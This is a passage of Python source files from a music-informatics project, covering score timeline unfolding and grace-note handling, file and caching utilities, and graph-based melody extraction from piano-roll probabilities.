t_unfold += (ending.start.t - repeat.start.t)
else:
# no: add the full interval of the repeat (the second time)
times.append((repeat.start, repeat.end, t_unfold))
# update t_unfold accordingly
t_unfold += (repeat.end.t - repeat.start.t)
# this repeat has been handled, update the score time
t_score = repeat.end
# are we at a da capo sign?
if reached_dacapo:
# yes; is there a fine?
if fine is not None:
# yes
# get the notes starting at the fine sign
notes = fine.start.get_starting_objects_of_type(Note)
# TODO: the following appears to be incorrect, the
# musicxml spec says the fine *follows* the last notes
# to be played, so the end point should always be the
# time instance of the fine sign, unless otherwise stated:
# TODO: if "fine" is a number, treat it as the quarter
# duration that all final notes are supposed to have,
# rather than have all the notes keep their own
# duration
# are there any notes starting at the fine sign?
if len(notes) > 0:
# yes: get the off times
off_times = np.array([n.end.t for n in notes])
# set the end point of the next interval to the
# latest off time
end_point = notes[np.argmax(off_times)].end
else:
# no: set the end point of the next interval to
# the time of the fine sign
end_point = fine.start
# add the interval from the start of the piece to
# end_point, which is either:
# 1. the end of the piece (no fine sign)
# 2. the time of the fine sign (no notes start at fine sign)
# 3. the offset of the longest note played at a fine sign (notes
# start at fine sign)
times.append((self.timeline.points[0], end_point, t_unfold))
else:
# not at a da capo sign
# are we at the end of the piece already?
if t_score < end_point:
# no, append the interval from the current score
# position to the end of the piece
times.append((t_score, end_point, t_unfold))
# for s, e, o in times:
# print(s.t, e.t, o)
return times
def unfold_timeline(self):
"""
Return a new TimeLine, where all repeat structures are
unfolded. This includes 1/2 endings (volta brackets),
and Da Capo al Fine structures. In this new timeline, both the
timepoints and the musical objects are copied to unfold the
structure. Note that the ID attributes of the musical objects
are copied along, so these ID's will not be unique (but the
duplicate ID's may be useful to identify which objects are
duplicates of which).
Returns
-------
tl : TimeLine object
A TimeLine object containing the unfolded timepoints
"""
self.test_timeline()
new_timeline = []
ending_objects_tmp = defaultdict(list)
def add_points_between(start, end, offset, prev_ending_objects,
object_map, include_end=False):
# print('add_points_between',start.t, end.t, offset, include_end)
end_operator = operator.le if include_end else operator.lt
point_idx = np.logical_and(
operator.ge(self.timeline.points, start),
end_operator(self.timeline.points, end))
# make a copy of all timepoints in the selected range
new_points = np.array([copy(x)
for x in self.timeline.points[point_idx]])
for i, tp in enumerate(new_points):
# let the range start at offset
tp.t = tp.t - start.t + offset
# make a copy of all starting objects, for the new
# objects, set the start attribute to the new
# timepoint, and set the new objects to be the
# starting objects of the new timepoint
new_starting = defaultdict(list)
for k, objects in tp.starting_objects.items():
new_objects = [copy(o) for o in objects]
for o in new_objects:
o.start = tp
object_map.update(zip(objects, new_objects))
new_starting[k] = new_objects
tp.starting_objects = new_starting
if i > 0:
new_ending = defaultdict(list)
for k, objects in tp.ending_objects.items():
new_objects = [object_map[o]
for o in objects]
for o in new_objects:
o.end = tp
new_ending[k] = new_objects
tp.ending_objects = new_ending
if len(new_points) > 0:
# print('setting ending objects from last repeat:')
# print(new_points[0].t)
new_points[0].ending_objects = prev_ending_objects
for k, oo in prev_ending_objects.items():
for o in oo:
o.end = new_points[0]
ending_objects_copy = defaultdict(list)
for k, oo in end.ending_objects.items():
ending_objects_copy[k] = [object_map[o] for o in oo]
return new_points, ending_objects_copy, object_map
o_map = {}
segments = self._make_repeat_structure()
N = len(segments)
for i, (start, end, offset) in enumerate(segments):
include_end = i == N - 1
new_points, ending_objects_tmp, o_map = \
add_points_between(
start, end, offset, ending_objects_tmp, o_map, include_end)
new_timeline.append(new_points)
# for new_points in new_timeline:
# for i,p in enumerate(new_points):
# for n in p.get_starting_objects_of_type(Note):
# if n.duration > 130:
# print(i, len(new_points))
# print(n)
# print('',n)
# assert 1 == 0
new_timeline = np.concatenate(new_timeline)
for i in range(1, len(new_timeline)):
new_timeline[i - 1].next = new_timeline[i]
new_timeline[i].prev = new_timeline[i - 1]
new_timeline[0].prev = None
new_timeline[-1].next = None
# assert np.all(np.diff(np.array([tp.t for tp in new_timeline])) > 0)
tl = TimeLine()
tl.points = new_timeline
# for tp in tl.points:
# print(tp)
# for n in tp.get_starting_objects_of_type(Note):
# print(n.start.t, tp.t, n.end.t)
# assert n.start.t <= n.end.t
return tl
def remove_grace_notes(self):
for point in self.timeline.points:
point.starting_objects[Note] = [n for n in point.starting_objects[Note]
if n.grace_type is None]
point.ending_objects[Note] = [n for n in point.ending_objects[Note]
if n.grace_type is None]
def expand_grace_notes(self, default_type='appoggiatura', min_steal=.05, max_steal=.7):
"""
Expand durations of grace notes according to their
specifications, or according to the default settings specified
using the keywords. The onsets/offsets of the grace notes and
surrounding notes are set accordingly. Multiple contiguous
grace notes inside a voice are expanded sequentially.
This function modifies the `points` attribute.
Parameters
----------
default_type : str, optional. Default: 'appoggiatura'
the type of grace note, if no type is specified. Possibilities
are: {'appoggiatura', 'acciaccatura'}.
min_steal : float, optional
the min steal proportion if no proportion is specified
max_steal : float, optional
the max steal proportion if no proportion is specified
"""
assert default_type in (u'appoggiatura', u'acciaccatura')
assert 0 < min_steal <= max_steal
assert min_steal <= max_steal < 1.0
def n_notes_to_steal(n_notes):
return min_steal + (max_steal - min_steal) * 2 * (1 / (1 + np.exp(- n_notes + 1)) - .5)
# def shorten_main_notes_by(dur_prop, notes, group_id):
# # start and duration of the main note
# old_start = notes[0].start
# n_dur = np.min([n.duration for n in notes])
# new_start_t = old_start.t + n_dur * dur_prop
# print(n_dur * dur_prop)
# for i, n in enumerate(notes):
# old_start.starting_objects[Note].remove(n)
# self.timeline.add_starting_object(new_start_t, n)
# n.appoggiatura_group_id = group_id
# n.appoggiatura_duration = dur_prop
# return new_start_t
def shorten_main_notes_by(offset, notes, group_id):
# start and duration of the main note
old_start = notes[0].start
n_dur = np.min([n.duration for n in notes])
# print('app', n_dur, offset)
offset = min(n_dur * .5, offset)
new_start_t = old_start.t + offset
for i, n in enumerate(notes):
old_start.starting_objects[Note].remove(n)
self.timeline.add_starting_object(new_start_t, n)
n.appoggiatura_group_id = group_id
n.appoggiatura_duration = offset / float(n_dur)
return new_start_t
# def shorten_prev_notes_by(dur_prop, notes, group_id):
# old_end = notes[0].end
# n_dur = notes[0].duration
# new_end_t = old_end.t - n_dur * dur_prop
# for n in notes:
# old_end.ending_objects[Note].remove(n)
# self.timeline.add_ending_object(new_end_t, n)
# n.acciaccatura_group_id = group_id
# n.acciaccatura_duration = dur_prop
# return new_end_t
def shorten_prev_notes_by(offset, notes, group_id):
old_end = notes[0].end
n_dur = notes[0].duration
#print('acc', n_dur, offset)
offset = min(n_dur * .5, offset)
new_end_t = old_end.t - offset
for n in notes:
old_end.ending_objects[Note].remove(n)
self.timeline.add_ending_object(new_end_t, n)
n.acciaccatura_group_id = group_id
n.acciaccatura_duration = offset / float(n_dur)
return new_end_t
def set_acciaccatura_times(notes, start_t, group_id):
N = len(notes)
end_t = notes[0].start.t
times = np.linspace(start_t, end_t, N + 1, endpoint=True)
for i, n in enumerate(notes):
n.start.starting_objects[Note].remove(n)
self.timeline.add_starting_object(times[i], n)
n.end.ending_objects[Note].remove(n)
self.timeline.add_ending_object(times[i + 1], n)
n.acciaccatura_group_id = group_id
n.acciaccatura_idx = i
n.acciaccatura_size = N
def set_appoggiatura_times(notes, end_t, group_id):
N = len(notes)
start_t = notes[0].start.t
times = np.linspace(start_t, end_t, N + 1, endpoint=True)
for i, n in enumerate(notes):
n.start.starting_objects[Note].remove(n)
self.timeline.add_starting_object(times[i], n)
n.end.ending_objects[Note].remove(n)
self.timeline.add_ending_object(times[i + 1], n)
n.appoggiatura_group_id = group_id
n.appoggiatura_idx = i
n.appoggiatura_size = N
self.timeline.unlock()
grace_notes = [n for n in self.notes if n.grace_type is not None]
time_grouped_gns = partition(
operator.attrgetter('start.t'), grace_notes)
times = sorted(time_grouped_gns.keys())
group_counter = 0
for t in times:
voice_grouped_gns = partition(operator.attrgetter('voice'),
time_grouped_gns[t])
# print(t)
for voice, gn_group in voice_grouped_gns.items():
# print(' voice {}'.format(voice))
for n in gn_group:
if n.grace_type == 'grace':
n.grace_type = default_type
type_grouped_gns = partition(operator.attrgetter('grace_type'),
gn_group)
for gtype, type_group in type_grouped_gns.items():
total_steal_old = n_notes_to_steal(len(type_group))
total_steal = np.sum([n.duration_from_symbolic for n
in type_group])
# print("n_notes, old, new", len(type_group), total_steal_old, total_steal)
# print(' {}: {} {:.3f}'.format(gtype, len(type_group),
# total_steal))
main_notes = [m for m in type_group[0].simultaneous_notes_in_voice
if m.grace_type is None]
# multip
if len(main_notes) > 0:
# total_steal =
total_steal = min(main_notes[0].duration / 2., total_steal)
if gtype == 'appoggiatura':
# main_notes = [m for m in type_group[0].simultaneous_notes_in_voice
# if m.grace_type is None]
# print(total_steal, len(type_group))
total_steal = np.sum([n.duration_from_symbolic for n
in type_group])
# if len(main_notes) == 0:
# main_notes = [m for m in type_group[0].next_notes_in_voice
# if m.grace_type is None]
# print(' main: {}'.format(len(main_notes)))
if len(main_notes) > 0:
new_onset = shorten_main_notes_by(
total_steal, main_notes, group_counter)
set_appoggiatura_times(
type_group, new_onset, group_counter)
group_counter += 1
elif gtype == 'acciaccatura':
prev_notes = [m for m in type_group[0].previous_notes_in_voice
if m.grace_type is None]
# print(' prev: {}'.format(len(prev_notes)))
if len(prev_notes) > 0:
new_offset = shorten_prev_notes_by(
total_steal, prev_notes, group_counter)
set_acciaccatura_times(
type_group, new_offset, group_counter)
group_counter += 1
self.timeline.link()
self.timeline.lock()
def pprint(self, l=0):
pre = u' ' * l
s = [u'{}{} ({})'.format(pre, self.part_name, self.part_id)]
bm = self.beat_map
for tp in self.timeline.points:
#s.append(pre + tp.__unicode__() + u'(beat: {0})'.format(bm(tp.t)))
s.append(u'{}{}(beat: {})'.format(pre, tp, bm(tp.t)[0]))
for cls, objects in tp.starting_objects.items():
if len(objects) > 0:
#s.append(pre + u' {0}'.format(cls.__name__))
s.append(u'{} {}'.format(pre, cls.__name__))
for o in objects:
#s.append(pre + u' {0}'.format(o))
s.append(u'{} {}'.format(pre, o))
s.append(u' Stop')
for cls, objects in tp.ending_objects.items():
if len(objects) > 0:
#s.append(pre + u' {0}'.format(cls.__name__))
s.append(u'{} {}'.format(pre, cls.__name__))
for o in objects:
#s.append(pre + u' {0}'.format(o))
s.append(u'{} {}'.format(pre, o))
return u'\n'.join(s)
def _get_beat_map(self, quarter=False, default_div=1, default_den=4):
"""
Return an interpolator that accepts timestamps in divisions and
returns the corresponding beat numbers. If the flag `quarter` is
used, the beat numbers refer to quarter-note steps.
Parameters
----------
quarter : boolean, optional. Default: False
Returns
-------
scipy interpolate interp1d object
"""
if len(self.timeline.points) == 0:
return None
try:
first_measure = self.timeline.points[
0].get_starting_objects_of_type(Measure)[0]
if first_measure.upbeat:
offset = -first_measure.get_measure_duration(quarter=quarter)
else:
offset = 0
except IndexError:
offset = 0
divs = np.array(
[(x.start.t, x.divs) for x in
self.timeline.get_all_of_type(Divisions)], dtype=np.int)
dens = np.array(
[(x.start.t, np.log2(x.beat_type)) for x in
self.timeline.get_all_of_type(TimeSignature)], dtype=np.int)
if divs.shape[0] == 0:
LOGGER.warning(("No Divisions found in ScorePart, "
"assuming divisions = {0}").format(default_div))
divs = np.array(((0, default_div),), dtype=np.int)
if dens.shape[0] == 0:
LOGGER.warning(("No TimeSignature found in ScorePart, "
"assuming denominator = {0}").format(default_den))
dens = np.array(((0, np.log2(default_den)),), dtype=np.int)
# remove lines unnecessary for linear interpolation
didx = np.r_[0, np.where(np.diff(divs[:, 1]) != 0)[0] + 1]
divs = divs[didx]
# remove lines unnecessary for linear interpolation
didx = np.r_[0, np.where(np.diff(dens[:, 1]) != 0)[0] + 1]
dens = dens[didx]
start = self.timeline.points[0].t
end = self.timeline.points[-1].t
if divs[-1, 0] < end:
divs = np.vstack((divs, (end, divs[-1, 1])))
if dens[-1, 0] < end:
dens = np.vstack((dens, (end, dens[-1, 1])))
if divs[0, 0] > start:
divs = np.vstack(((start, divs[0, 1]), divs))
if dens[0, 0] > start:
dens = np.vstack(((start, dens[0, 1]), dens))
if quarter:
dens[:, 1] = 1
# integrate second column, where first column is time:
# new_divs = np.cumsum(np.diff(divs[:, 0]) * divs[:-1, 1])
new_divs = divide_outside_cumsum(divs)
divs = divs.astype(np.float)
divs[1:, 1] = new_divs
divs[0, 1] = divs[0, 0]
# at this point divs[:, 0] is a list of musicxml div times
# and divs[:, 1] is a list of corresponding quarter note times
# interpolation object to map div times to quarter times:
# div_intp = my_interp1d(divs[:, 0], divs[:, 1])
div_intp = interp1d(divs[:, 0], divs[:, 1])
dens = dens.astype(np.float)
# change dens[:, 0] from div to quarter times
dens[:, 0] = div_intp(dens[:, 0])
# change dens[:, 1] back from log2(beat_type) to beat_type and divide by
# 4; here take the reciprocal (4 / 2**dens[:, 1]) since in divide_outside_cumsum we will be
# dividing rather than multiplying:
dens[:, 1] = 4 / 2**dens[:, 1]
# dens_new = np.cumsum(np.diff(dens[:, 0]) * dens[:-1, 1])
dens_new = divide_outside_cumsum(dens)
dens[1:, 1] = dens_new
dens[0, 1] = dens[0, 0]
den_intp = interp1d(dens[:, 0], dens[:, 1])
if len(self.timeline.points) < 2:
return lambda x: np.zeros(len(x))
else:
def f(x):
try:
# divi = div_intp(x)
# deni = den_intp(divi) + offset
# np.savetxt('/tmp/bm.txt', np.column_stack((x, divi, deni)), fmt="%.3f")
# np.savetxt('/tmp/den.txt', dens, fmt="%.3f")
# return deni
return den_intp(div_intp(x)) + offset
except ValueError:
print(np.min(x),np.max(x))
raise
return f
def _get_notes(self, unfolded=False):
"""
return all note objects of the score part.
Parameters
----------
unfolded : boolean, optional. Default: False
whether to unfold the timeline or not.
Returns
-------
notes : list of Note objects
"""
notes = []
if unfolded:
tl = self.unfold_timeline()
else:
tl = self.timeline
for tp in tl.points:
notes.extend(tp.get_starting_objects_of_type(Note) or [])
return notes
def get_loudness_directions(self):
"""
return all loudness directions
"""
return self.timeline.get_all_of_type(LoudnessDirection, include_subclasses=True)
# directions = []
# for tp in self.timeline.points:
# directions.extend(
# tp.get_starting_objects_of_type(DynamicLoudnessDirection) or [])
# directions.extend(
# tp.get_starting_objects_of_type(ConstantLoudnessDirection) or [])
# directions.extend(
# tp.get_starting_objects_of_type(ImpulsiveLoudnessDirection) or [])
# return directions
def get_tempo_directions(self):
"""
return all tempo directions
"""
return self.timeline.get_all_of_type(TempoDirection, include_subclasses=True)
# directions = []
# for tp in self.timeline.points:
# directions.extend(
# tp.get_starting_objects_of_type(DynamicTempoDirection) or [])
# directions.extend(
# tp.get_starting_objects_of_type(ConstantTempoDirection) or [])
# return directions
# @property
@cached_property
def notes(self):
"""
all note objects
"""
return self._get_notes()
@cached_property
def notes_unfolded(self):
"""
all note objects, with unfolded timeline.
"""
return self._get_notes(unfolded=True)
#@cached_property
@property
def beat_map(self):
"""
map timeline times to beat times
"""
return self._get_beat_map()
#@cached_property
@property
def quarter_map(self):
"""
map timeline times to beat times
"""
return self._get_beat_map(quarter=True)
```
#### File: extra/tests/test_matchfile.py
```python
import argparse
import numpy as np
from data_handling import matchfile
from data_handling.sparse_feature_extraction import score2spr
from data_handling.sparse_datafiles import csr_to_file
def summarize_match_file(m):
"""
Display some information from a Match file
:param m: a MatchFile object
"""
# print header info
for line in m.info():
print(u' {0}\t{1}'.format(line.Attribute,line.Value).expandtabs(20))
# print time sig info
print('Time signatures:')
for t, (n, d) in m.time_signatures:
print(' {0}/{1} at beat {2}'.format(n, d, t))
def get_notes_from_match(m):
notes = np.array([(sn.OnsetInBeats, sn.OffsetInBeats, sn.MidiPitch[0])
for sn, n in m.note_pairs], np.float)
lowest = 30
highest = 100
beat_div = 8
neighbour_beats = 2
onset_only = True
A, _ = score2spr(notes, onset_only, lowest, highest, beat_div, neighbour_beats)
outfile = '/tmp/sparse.npz'
print('saving sparse matrix to {0}'.format(outfile))
csr_to_file(outfile, A)
def main():
"""
Illustrate some functionality of the match module
"""
parser = argparse.ArgumentParser("Get information from a Matchfile file")
parser.add_argument("file", help="Match file")
args = parser.parse_args()
m = matchfile.MatchFile(args.file)
#summarize_match_file(m)
get_notes_from_match(m)
if __name__ == '__main__':
main()
```
#### File: extra/utils/os_utils.py
```python
import subprocess
import sys
import tty
import termios
import os
import re
from collections import defaultdict
import signal
import logging
import functools
from functools import wraps
import cPickle
import bz2
import gzip
from cPickle import UnpicklingError
LOGGER = logging.getLogger(__name__)
def load_pyc_bz(fn):
return cPickle.load(bz2.BZ2File(fn, 'r'))
def save_pyc_bz(d, fn):
cPickle.dump(d, bz2.BZ2File(fn, 'w'), cPickle.HIGHEST_PROTOCOL)
def load_pyc_gz(fn):
return cPickle.load(gzip.GzipFile(fn, 'r'))
def save_pyc_gz(d, fn):
cPickle.dump(d, gzip.GzipFile(fn, 'w'), cPickle.HIGHEST_PROTOCOL)
def get_from_cache_or_compute(cache_fn, func, args=(), kwargs={}, refresh_cache=False):
"""
If `cache_fn` exists, return the unpickled contents of that file
(the cache file is treated as a bzipped pickle file). If this
fails, compute `func`(*`args`), pickle the result to `cache_fn`,
and return the result.
Parameters
----------
func : function
function to compute
args : tuple
argument for which to evaluate `func`
cache_fn : str
file name to load the computed value `func`(*`args`) from
refresh_cache : boolean
if True, ignore the cache file, compute function, and store the result in the cache file
Returns
-------
object
the result of `func`(*`args`)
"""
result = None
if cache_fn is not None and os.path.exists(cache_fn):
if refresh_cache:
os.remove(cache_fn)
else:
try:
result = load_pyc_bz(cache_fn)
except UnpicklingError as e:
LOGGER.error(('The file {0} exists, but cannot be unpickled. Is it readable? Is this a pickle file?'
'').format(cache_fn))
raise e
if result is None:
result = func(*args, **kwargs)
if cache_fn is not None:
save_pyc_bz(result, cache_fn)
return result
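# Usage sketch (hypothetical file name and function, not from the original module):
#
#   def compute_features(n):
#       return [i ** 2 for i in range(n)]
#
#   feats = get_from_cache_or_compute('/tmp/features.pyc.bz', compute_features, args=(1000,))
#
# The first call computes the value and pickles it to the bzipped cache file; later calls
# load it from the cache, unless refresh_cache=True forces recomputation.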
def debug_mode(logger):
"""
Return True when logger is in DEBUG mode, False otherwise.
:param logger: a Logger instance from the logging module
:return: True or False
"""
return logger.getEffectiveLevel() == logging.DEBUG
def init_worker():
"""
Setup a worker to ignore signals
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
# class KeyboardInterruptError(Exception): pass
# this approach doesn't really work
# since decorated functions can't be pickled
def catch_KeyboardInterrupt(fun):
def wrapper(*args, **kwargs):
try:
return fun(*args, **kwargs)
except KeyboardInterrupt:
raise KeyboardInterruptError()
return wrapper
class Result(object):
"""
A drop-in replacement for the Result object returned by
asynchronous multiprocessing calls
"""
def __init__(self, v):
self.v = v
def get(self):
return self.v
class FakePool(object):
"""
A drop-in replacement for multiprocessing.Pool that
carries out jobs sequentially (useful for debugging).
"""
def __init__(self, *args):
pass
def map(self, f, a):
return map(f, a)
def apply_async(self, f, args=(), kwargs={}, callback=None):
if callback:
callback(f(*args, **kwargs))
else:
return Result(f(*args, **kwargs))
def close(self):
pass
def terminate(self):
pass
def join(self):
pass
class PoolWrapper(object):
"""
Wrap a target callable so that it can be used with multiprocessing pools:
the call unpacks its argument tuple and turns a KeyboardInterrupt raised in
the child process into a None return value instead of a traceback.
"""
def __init__(self, target):
self.target = target
try:
functools.update_wrapper(self, target)
except:
pass
def __call__(self, args):
try:
return self.target(*args)
except KeyboardInterrupt:
print('child interrupted')
return None
def pair_files(dir_dict, remove_incomplete=True):
"""
Pair files in directories;
dir_dict is of form (label: directory)
"""
result = defaultdict(dict)
for label, directory in dir_dict.items():
for f in os.listdir(directory):
name = os.path.splitext(f)[0]
result[name][label] = f
if remove_incomplete:
labels = dir_dict.keys()
for k in result.keys():
if not all([y in result[k] for y in labels]):
del result[k]
return result
def pair_files_new(dir_dict, remove_incomplete=True,
split=False, remove_parts=set()):
"""
Pair files in directories;
dir_dict is of form (label: directory)
"""
result = defaultdict(dict)
if split:
pat = re.compile(split)
for label, directory in dir_dict.items():
for f in os.listdir(directory):
name = os.path.splitext(f)[0]
if split:
key = tuple([x for i, x in enumerate(pat.split(name))
if not i in remove_parts])
else:
key = name
result[key][label] = f
if remove_incomplete:
labels = dir_dict.keys()
for k in result.keys():
if not all([y in result[k] for y in labels]):
del result[k]
return result
def get_output_from_command(cmd):
"""Simple wrapper around popen2, to get output from a shell command"""
p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, close_fds=True)
p.stdin.close()
result = p.stdout.readlines()
p.stdout.close()
return result
class _Getch:
"""
Get a single character from standard input;
Do not echo to the screen
"""
def __init__(self, enc=False):
try:
self.impl = _GetchUnix(enc)
except ImportError:
self.impl = _GetchWindows(enc)
def __call__(self):
return self.impl()
class _GetchUnix:
def __init__(self, enc=False):
self.enc = enc
if self.enc:
import codecs
import locale
# Wrap stdin with an encoding-aware reader.
_, encoding = locale.getdefaultlocale()
encoding = encoding or 'utf8'
self.stdin = codecs.getreader(encoding)(sys.stdin)
else:
self.stdin = sys.stdin
def __call__(self):
# import sys, tty, termios
fd = self.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = self.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self, enc=False):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
get_character = _Getch()
get_character_enc = _Getch(enc=True)
def interrupt_decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except KeyboardInterrupt:
print('\nfunction {0}.{1} was configured to intercept '
'KeyboardInterrupts. Press "a" to abort, or any other '
'key to continue.'
.format(f.__module__, f.__name__))
x = get_character()
if x == 'a':
raise KeyboardInterrupt
else:
return None
return wrapper
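# Usage sketch (hypothetical long-running function):
#
#   @interrupt_decorator
#   def long_job():
#       ...
#
# Pressing Ctrl-C inside long_job() triggers the prompt above: typing "a" re-raises
# KeyboardInterrupt, any other key makes the call return None and execution continues.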
if __name__ == '__main__':
pass
```
#### File: Symbolic-Melody-Identification/melody_extractor/graph_tools.py
```python
import time
import math
import numpy as np
import sklearn.metrics
from scipy.sparse import csgraph
from sklearn.model_selection import train_test_split
import misc_tools
import settings
try:
import cPickle as pickle
except Exception:
import pickle
FINAL_VALUE = -0.5
def compute_prob(note, prob_map, THRESHOLD):
"""
compute the probability of *note* referred to *prob_map*.
If the probability is higher than *THRESHOLD*, than the cost will
be > 0, otherwise it will be 0.
"""
pitch, onset, offset, ismelody = note
m = prob_map[pitch, onset: offset]
if m.shape[0] > 2 and settings.OUTLIERS_ON_PROB:
m = m[modified_z_score(m)]
if settings.AVERAGE:
p = m.mean()
else:
p = np.median(m)
if p < THRESHOLD:
return -0.5
else:
return p
def build_graph_matrix(notelist, prob_map, THRESHOLD):
"""
Returns a 2D array containing the matrix relative to the branch costs
in the graph. For each note A in *notelist*, it creates branches to the
notes N_i so that:
1) onset(N_k) == onset(N_l) for each k, l
2) onset(N_i) == min{onset(Y) : onset(Y) > offset(A), cost(Y) = 1 - probability(Y) <= *THRESHOLD*} for each i
This also adds two new virtual notes representing the first and the last
note.
"""
out = np.full((len(notelist) + 2, len(notelist) + 2),
np.inf,
dtype=settings.floatX)
last_onset = notelist[0][0]
# initialize the starting virtual note
FOUND_NEXT_NOTE = False
for i, note_i in enumerate(notelist, start=1):
pitch_i, onset_i, offset_i, melody_i = note_i
if onset_i > last_onset and FOUND_NEXT_NOTE:
# we have found a note in the previous onset
break
cost_i = -compute_prob(note_i, prob_map, THRESHOLD)
if cost_i > 0:
continue
else:
FOUND_NEXT_NOTE = True
out[0, i] = cost_i
last_onset = onset_i
for i, note_i in enumerate(notelist):
pitch_i, onset_i, offset_i, melody_i = note_i
FOUND_NEXT_NOTE = False
for j, note_j in enumerate(notelist[i + 1:], start=1):
pitch_j, onset_j, offset_j, melody_j = note_j
if onset_j < offset_i:
continue
elif FOUND_NEXT_NOTE and notelist[i + j - 1][0] < onset_j:
break
cost_j = -compute_prob(note_j, prob_map, THRESHOLD)
if cost_j > 0:
continue
else:
FOUND_NEXT_NOTE = True
# i + 1 because we have added a virtual note
out[(i + 1), (i + 1) + j] = cost_j
last_onset = onset_j # this is the last note reachable
if not FOUND_NEXT_NOTE:
# let's jump to the last virtual state
out[(i + 1), -1] = FINAL_VALUE
# making the last notes pointing to the ending virtual note
# is this required??
for i, note_i in enumerate(reversed(notelist), start=2):
if note_i[1] < last_onset:
break
elif note_i[1] > last_onset:
continue
else:
out[-i, -1] = FINAL_VALUE
return out
def _check(notelist, pianoroll_prob):
"""
Just for debugging
"""
WIN_WIDTH = int(settings.ARG_DEFAULT['win_w'])
EPS = misc_tools.EPS(0)
for j, (onset, offset, pitch) in enumerate(notelist):
flag = False
if pianoroll_prob[pitch, onset] < EPS:
for i in range(WIN_WIDTH):
if pianoroll_prob[pitch, onset - i] >= EPS:
print("you're wrong of -" + str(i) +
" for onset of note " + str(j))
flag = True
break
if pianoroll_prob[pitch, onset + i] >= EPS:
print("you're wrong of +" + str(i) +
" for onset of note " + str(j))
flag = True
break
elif pianoroll_prob[pitch, offset - 1] < EPS:
for i in range(WIN_WIDTH):
if pianoroll_prob[pitch, offset - 1 - i] >= EPS:
print("you're wrong of -" + str(i) +
" for offset of note " + str(j))
flag = True
break
if pianoroll_prob[pitch, offset - 1 + i] >= EPS:
print("you're wrong of +" + str(i) +
" for offset of note " + str(j))
flag = True
break
else:
for i in range(onset, offset):
if pianoroll_prob[pitch, i] < EPS:
print("note " + str(j) + " has some internal values set to 0")
flag = True
break
if flag:
return 1
# if not flag:
# print("note " + str(j) + " is correct")
return 0
def modified_z_score(ys):
"""
PARAMETERS :
------------
list-like object, usually 1D np.array
RETURN :
--------
a new 1D np.array containing the indices of the elements that are not outliers
stolen from http://colingorrie.github.io/outlier-detection.html
"""
threshold = 3.5
median_y = np.median(ys)
median_absolute_deviation_y = np.median([np.abs(y - median_y) for y in ys])
modified_z_scores = [0.6745 * (y - median_y) / median_absolute_deviation_y
for y in ys]
return np.where(np.abs(modified_z_scores) < threshold)[0]
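# Illustrative example: for ys = [1.0, 1.1, 0.9, 1.0, 10.0] the median is 1.0 and the
# median absolute deviation is 0.1, so the last element gets a modified z-score of
# 0.6745 * 9.0 / 0.1 ~ 60.7 (well above the 3.5 threshold) and is dropped; the function
# returns the indices [0, 1, 2, 3].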
def iqr(ys):
"""
PARAMETERS :
------------
list-like object, usually 1D np.array
RETURN :
--------
a new 1D np.array containing the indices of the elements that are not outliers
stolen from http://colingorrie.github.io/outlier-detection.html
"""
quartile_1, quartile_3 = np.percentile(ys, [25, 75])
iqr = quartile_3 - quartile_1
lower_bound = quartile_1 - (iqr * 1.5)
upper_bound = quartile_3 + (iqr * 1.5)
return np.where((ys < upper_bound) & (ys > lower_bound))[0]
def set_threshold(arr, CLUSTERING='single'):
print("starting clustering")
arr = arr.reshape(-1)
arr = arr[arr > settings.MIN_TH]
N_CLUSTER = 2
target_cluster = 1
print("max, min: ", arr.max(), arr.min())
arr = arr[iqr(arr)]
if CLUSTERING == 'kmeans':
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=N_CLUSTER,
init=np.array([settings.MIN_TH, arr.max()]).reshape(-1, 1))
labels = kmeans.fit_predict(arr.reshape(-1, 1))
else:
import fastcluster
from scipy.cluster.hierarchy import fcluster
from scipy.spatial.distance import pdist
Z = pdist(arr.reshape(-1, 1))
if CLUSTERING == 'single':
X = fastcluster.single(Z)
elif CLUSTERING == 'average':
X = fastcluster.average(Z)
elif CLUSTERING == 'centroid':
X = fastcluster.centroid(Z)
else:
return settings.THRESHOLD
labels = N_CLUSTER - fcluster(X, N_CLUSTER, 'maxclust')
# setting 0 for the minimum cluster
# np.ma.masked_array returns only values where the mask is 0
index = {}
for i, l in enumerate(labels):
index[l] = arr[i]
if len(index.keys()) == N_CLUSTER:
break
index = sorted(index.items(), key=lambda kv: kv[1]) # list of tuples sorted by values
target_label = index[target_cluster - 1][0] # the label of the desired cluster
th = np.max(arr[np.flatnonzero(labels == target_label)]) # max of the down cluster
print("found threshold: " + str(th))
# print(str(np.ma.masked_array(arr, 1 - labels).min()))
return th
def polyphonic_part(notelist, pianoroll_prob, THRESHOLD):
"""
Returns a list of int: 1 if the note at that index in *notelist* has a
probability > *THRESHOLD*, 0 otherwise.
"""
predicted_labels = []
for note in notelist:
c = compute_prob(note, pianoroll_prob, THRESHOLD)
if np.isnan(c):
# don't know why this happens, we had already discarded nans...
predicted_labels.append(0)
else:
predicted_labels.append(int(math.ceil(c)))
return predicted_labels
def monophonic_part(notelist, pianoroll_prob, THRESHOLD):
"""
Compute a strictly monophonic part by using the shortest path algorithm
specified in `settings`
RETURNS :
a tuple containing :
list(int) : the predicted labels
list(int) : the melody indices
"""
# compute the graph matrix
graph = build_graph_matrix(notelist, pianoroll_prob, THRESHOLD)
# compute the minimum paths
dist_matrix, predecessors = csgraph.shortest_path(graph, method=settings.PATH_METHOD,
directed=True,
indices=[0],
return_predecessors=True)
# building the predicted array label
last = predecessors[0, -1]
predicted_labels = [0 for j in range(len(notelist) + 2)]
melody_indices = []
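# csgraph.shortest_path marks "no predecessor" with the sentinel -9999, so the loop
# below walks the path from the ending virtual note back towards the start.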
while last != -9999:
predicted_labels[last] = 1
melody_indices.append(last)
last = predecessors[0, last]
predicted_labels = predicted_labels[1:-1]
return predicted_labels, melody_indices
def predict_labels(pianoroll_prob, in_notelist):
"""
Compute notes in the solo part according to the input notelist
and a pianoroll probability distribution.
PARAMETERS :
pianoroll_prob : 2d np.array
the pianoroll distribution
in_notelist : 2d np.array
the input list of notes as returned by
`utils.pianoroll_utils.make_pianorolls`
RETURNS :
a tuple of 1D arrays :
true labels according to `in_notelist` (1 where there is a 'solo
